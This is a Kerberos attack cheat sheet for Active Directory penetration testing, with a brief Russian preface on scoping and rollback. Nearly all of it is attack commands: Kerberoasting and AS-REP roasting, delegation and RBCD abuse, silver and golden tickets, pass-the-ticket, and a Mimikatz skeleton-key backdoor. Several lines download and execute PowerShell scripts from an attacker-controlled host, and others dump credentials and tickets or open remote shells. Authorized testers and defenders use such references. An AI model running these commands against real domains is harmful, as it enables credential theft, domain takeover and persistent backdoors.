Kerberos
:::tip Формат страницы
Порядок действий описан по‑русски. В методике сохранены заголовки (частично локализованы типовые термины), таблицы, иллюстрации и блоки кода: команды и параметры на английском, без перевода синтаксиса.
:::
Порядок действий
- Зафиксируйте роль в домене и допустимые техники (read‑only / согласованная эксплуатация).
- Соберите данные для картирования атаки (учётки, делегирование, доверия).
- Двигайтесь по сценариям раздела с планом отката и контролем DC.
- Команды и инструменты в блоках кода — на английском.
Методика
Ticket gathering
# Gathers tickets that are being transferred to the KDC
Rubeus.exe harvest /interval:30
# Extract current TGTs
Rubeus.exe dump
Kerberoasting
# Rubeus
IEX(New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>/Invoke-Rubeus.ps1') ; Invoke-Rubeus kerberoast
# Kerberoast
IEX(New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat {John | Hashcat} [ | % { $_.Hash } | Out-File -Encoding ASCII kerberoast_hashes.txt ]
GetUserSPNs.py '<Domain>/<Username>:<Password>' -request -save -outputfile GetUserSPNs.txt -dc-ip $IP
IEX(New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>/Invoke-Kerberoast.ps1'); Get-NetUser| select samaccountname,serviceprincipalname
Cracking Kerberos Hashes
hashcat -m 13100 GetUserSPNs.txt <WORDLIST> -o <RESULT.txt>
AS-REProasting
# Adjust the output hash so it starts with "$krb5asrep$23$..." (the format hashcat mode 18200 expects)
.\Rubeus.exe asreproast
# check ASREPRoast for all domain users (credentials required)
python GetNPUsers.py <domain_name>/<domain_user>[:<domain_user_password>] [-no-pass] -request -format {hashcat | john} -outputfile <output_AS_REP_responses_file>
# check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py <domain_name> [-usersfile <users_file>] -format {hashcat | john} -outputfile <output_AS_REP_responses_file> [-no-pass]
Cracking password
hashcat -m 18200 -a 0 <hashes.txt> <wordlist.txt>
User Enum (Abusing Pre-Authentication)
kerbrute userenum --dc <DOMAIN_IP> -d <DOMAIN> <users.txt>
Unconstrained Delegation
Cached tickets
.\Rubeus.exe triage
.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:<USER> /password:FakePass /ticket:<TICKET>
Force machines authentication
C:\Windows\Tasks\PsExec64.exe -accepteula -s -d -i cmd.exe
.\Rubeus.exe monitor /interval:10 /nowrap
.\SharpSpoolTrigger.exe <TARGET_HOSTNAME> <LISTENER_HOSTNAME>
.\PetitPotam.exe <LISTENER_HOSTNAME> <TARGET_HOSTNAME>
.\SpoolSample.exe <TARGET_HOSTNAME> <LISTENER_HOSTNAME>
new-object system.net.webclient).downloadstring('http://<YOUR_IP>/Invoke-Spoolsample.ps1') | IEX
Invoke-Spoolsample -Command "<TARGET_HOSTNAME> <LISTENER_HOSTNAME>"
python3 printerbug.py <DOMAIN>/<USERNAME>:<PASSWORD>@<TARGET_HOOSTNAME> <LISTENER_HOSTNAME>
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/<TARGET_HOSTNAME> /user:<TARGET_HOSTNAME>$ /nowrap /ticket:<TICKET>
# Create a new process
.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:Administrator /password:FakePass123 /ticket:<TICKET>
# Import the ticket into the process
Invoke-Mimikatz -Command '"kerberos::ptt <KIRBI_FILE>"'
ls \\<HOSTNAME>\C$
Constrained Delegation
# List the tickets
.\Rubeus.exe triage
# Obtain the ticket
.\Rubeus.exe dump /service:krbtgt /nowrap /luid:<LUID>
.\Rubeus.exe s4u /impersonateuser:<IMPERSONATE_USER> /msdsspn:<ALLOWED2DELEGATE_SERVICE>/<ALLOWED2DELEGATE_HOSTNAME> /user:<ALLOWED2DELEGATE_HOSTNAME>$ /nowrap /ticket:<TICKET>
# Create a new process
.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:<IMPERSONATED_USER> /password:FakePass /ticket:<TICKET>
# Import Ticket into the process
Invoke-Mimikatz -Command '"kerberos::ptt <KIRBI_FILE>"'
ls \\<HOSNTAME>\c$
Resource-Based Constrained Delegation (msDS-AllowedToActOnBehalfOfOtherIdentity)
Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }
# Resolve the obtained SID to the name of the principal behind the ACE
ConvertFrom-SID <SID>
Get-DomainComputer -Identity <HOSTNAME> -Properties objectSid
$rsd = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<OBJECT_SID>)"; $rsdb = New-Object byte[] ($rsd.BinaryLength); $rsd.GetBinaryForm($rsdb, 0); Get-DomainComputer -Identity "<TARGET_HOSTNAME>" | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $rsdb} -Verbose
powershell Get-DomainComputer -Identity "<TARGET_HOSTNAME>" -Properties msDS-AllowedToActOnBehalfOfOtherIdentity
# Obtain the machine's krbtgt ticket
.\Rubeus.exe triage
.\Rubeus.exe dump /service:krbtgt /nowrap /luid:<MACHINE_LUID>
# Perform the S4u
\Rubeus.exe s4u /user:<MACHINE_WITH_HIGHER_PRIVILEGES>$ /impersonateuser:<USER> /msdsspn:cifs/<HOSTNAME>.<DOMAIN> /nowrap /ticket:<TICKET>
.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:<USER> /password:FakePass /ticket:<TICKET>
Alternate Service Name
.\Rubeus.exe s4u /ptt /impersonateuser:Administrator /msdsspn:<CONSTRAINED_SERVICE>/<HOSTNAME> /altservice:cifs /ticket:<TICKET>
Resource-Based Constrained Delegation (GenericWrite to Computer)
# Download dependencies
IEX(new-object system.net.webclient).downloadstring('http://<YOUR_IP>/PowerView.ps1');
IEX(new-object system.net.webclient).downloadstring('http://<YOUR_IP>/Powermad.ps1');
# Create a machine account
New-MachineAccount -MachineAccount myComputer -Password $(ConvertTo-SecureString 'h4x' -AsPlainText -Force)
# Create AccessControl
$sid =Get-DomainComputer -Identity myComputer -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($sid))"
$SDbytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDbytes,0)
# Write the security descriptor to the target machine's msDS-AllowedToActOnBehalfOfOtherIdentity attribute
Get-DomainComputer -Identity <VULNERABLE_MACHINE_NAME> | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
IEX(new-object system.net.webclient).downloadstring('http://<YOUR_IP>/Powermad.ps1');
IEX(new-object system.net.webclient).downloadstring('http://<YOUR_IP>/PowerView.ps1');
New-MachineAccount -MachineAccount rulon -Password $(ConvertTo-SecureString 'Password123!' -AsPlainText -Force) -Verbose
# If Set-ADComputer is not recognized, the ActiveDirectory PowerShell module must be installed first (requires high privileges)
Enable-WindowsOptionalFeature -FeatureName ActiveDirectory-Powershell -Online -All
Set-ADComputer <VULNERABLE_MACHINE_NAME> -PrincipalsAllowedToDelegateToAccount rulon$ -Server <DC_IP> -Verbose
impacket-addcomputer -computer-name 'myComputer$' -computer-pass 'h4x' <DOMAIN>/<USER>:<PASSWORD>
impacket-rbcd -action write -delegate-to "<TARGET_COMPUTER>" -delegate-from "myComputer$" <DOMAIN>/<USER>:<PASSWORD>
$RBCDbytes = Get-DomainComputer <VULNERABLE_MACHINE_NAME> -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RBCDbytes, 0
ConvertFrom-SIDsuccessfully $Descriptor.DiscretionaryAcl.SecurityIdentifier
IEX(new-object system.net.webclient).downloadstring('http://<YOUR_IP>/Invoke-Rubeus.ps1');
Invoke-Rubeus -Command 'hash /password:h4x'
Invoke-Rubeus -Command 's4u /user:myComputer$ /rc4:AA6EAFB522589934A6E5CE92C6438221 /impersonateuser:Administrator /msdsspn:CIFS/<VULNERABLE_MACHINE_NAME_DOMAIN> /domain:<DOMAIN> /dc:<DC_IP> /nowrap /ptt'
impacket-getST -spn cifs/<TARGET_HOSNTAME> -impersonate administrator '<DOMAIN>/myComputer$:h4x'
# Alternative 1 - Windows
ls \\<VULNERABLE_MACHINE_NAME>\c$
# Alternative 2 - Impacket
export KRB5CCNAME=$(pwd)/administrator.ccache
impacket-psexec administrator@backup01.corp.com -k -no-pass
S4U2Self Abuse
\Rubeus.exe s4u /impersonateuser:<ADMIN_USER> /nowrap /self /altservice:cifs/<HOSTNAME> /user:<HOSTNAME>$ /ticket:<TICKET>
WriteDacl over a group
Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_ | Select-object -Property ObjectDN,ActiveDirectoryRights, AceType, Identity | Format-List}}}
ObjectDN : CN=Admins,OU=Groups,DC=corp,DC=com
ActiveDirectoryRights : WriteDacl
AceType : AccessAllowed
Identity : CORP\User1
$creds = New-Object System.Management.Automation.PSCredential ("CORP\User1",(ConvertTo-SecureString "PassW0rd!" -AsPlainText -Force))
Add-DomainObjectAcl -TargetIdentity <VICTIM_IDENTITY> -PrincipalIdentity <NEW_USER> -Rights All -Verbose -Credential $creds
Add-DomainGroupMember -Identity 'Admins' -Members 'User1' -Credential $creds
Tickets
Silver Ticket (Local)
.\mimikatz.exe "privilege::debug" "lsadump::lsa /inject /name:<serviceName>"
.\mimikatz.exe "kerberos::golden /user:<Administrator> /domain:<domain> /sid:<ServiceSID> /krbtgt:<ServiceHash_NTLM> /id:<ServiceAccountID>"
dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
copy afile.txt \\vulnerable.computer\C$\Windows\Temp
Silver Ticket (Remote)
ticketer.py -nthash <NTLM_HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SPN_NAME> [-user-id <USER_ID|500>] <USERNAME_FOR_TICKET>
export KRB5CCNAME=<PATH>/<USERNAME_FOR_TICKET>.ccache
smbclient.py -k -no-pass <MACHINE>
psexec.py -k -no-pass <DOMAIN>/<USERNAME>@<MACHINE>
secretsdump.py -k -no-pass <DOMAIN>/<USERNAME>@<MACHINE>
Golden Ticket
.\mimikatz.exe "privilege::debug" "lsadump::lsa /inject /name:krbtgt"
.\mimikatz.exe "kerberos::golden /user:<Administrator> /domain:<DOMAIN> /sid:<DOMAIN_SID> /krbtgt:<KRBTGT_HTML> /ptt [/id:<ServiceAccountID>]" "exit"
Cracking tickets
tgsrepcrack.py <wordlist.txt> <ticket.kirbi>
Pass The Ticket
mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" # Dump all tickets to *.kirbi files
# Set the ticket for impacket use
export KRB5CCNAME=<TGT_ccache_file_path>
# Execute remote commands with any of the following commands by using the TGT
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pas
mimikatz.exe "kerberos::ptt <ticket.kirbi>"
# List tickets, checking it has been imported correctly
klist
# Import the ticket
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
# Execute a remote cmd
.\PsExec.exe -accepteula \\<remote_hostname> cmd
Skeleton Key backdoor
.\mimikatz.exe "privilege::debug" "misc::skeleton"
net use C:\\<DC>\admin$ /user:Administrator mimikatz